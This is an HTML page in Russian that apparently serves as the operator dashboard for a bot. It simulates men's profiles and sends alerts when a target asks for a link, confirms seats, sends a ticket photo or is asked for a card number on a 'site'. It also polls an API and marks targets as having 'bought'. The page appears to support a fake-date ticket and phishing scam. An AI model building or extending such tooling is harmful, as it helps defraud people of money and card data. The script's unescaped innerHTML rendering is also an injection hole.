<!DOCTYPE html>
<html lang="ru">
 <head>
  <meta charset="utf-8"/>
  <title>
   Уведомления от бота
  </title>
  <link href="style.css" rel="stylesheet"/>
 </head>
 <body onload="requestNotificationPermission()">
  <div class="container">
   <h1>
    📬 Панель управления ботом
   </h1>
   <button onclick="generateRandomUser()">
    🎭 Симулировать профиль парня
   </button>
   <br/>
   <br/>
   <div id="user-cards">
   </div>
  </div>
  <div class="panel">
   <textarea placeholder="✏️ Твоя команда боту"></textarea>
   <textarea placeholder="❓ Вопрос от бота (если не понял)"></textarea>
  </div>
  <script src="script.js">
  </script>
  <div style="padding: 20px;">
   <h3>
    Проверка уведомлений
   </h3>
   <button class="notify-button" data-message="🎭 Запрос на ссылку — зайди на сайт">
    Запрос ссылки
   </button>
   <button class="notify-button" data-message="📍 Подтверждение мест — проверь и отправь">
    Подтверждение мест
   </button>
   <button class="notify-button" data-message="🎫 Парень просит билет — зайди и отправь фото">
    Запрос билета
   </button>
   <button class="notify-button" data-message="💳 Запрос номера карты — зайди на сайт">
    Запрос номера карты
   </button>
   <button class="notify-button" data-message="🤔 Непонятный вопрос — проверь вручную на сайте">
    Непонятный вопрос
   </button>
  </div>
 
<script>
async function loadData() {
  const res = await fetch("/api/requests");
  const data = await res.json();
  const container = document.getElementById("requests");
  container.innerHTML = "";
  data.forEach(item => {
    const el = document.createElement("div");
    el.innerHTML = `<b>${item.username}</b> — ${item.event} <br> <button onclick="updateStatus(${item.tg_id}, 'купил', true)">Купил</button>`;
    container.appendChild(el);
  });
}

async function updateStatus(tg_id, key, value) {
  await fetch("/api/update", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({tg_id, key, value})
  });
  loadData();
}

setInterval(loadData, 3000);
</script>
<div id="requests"></div>

</body>
</html>
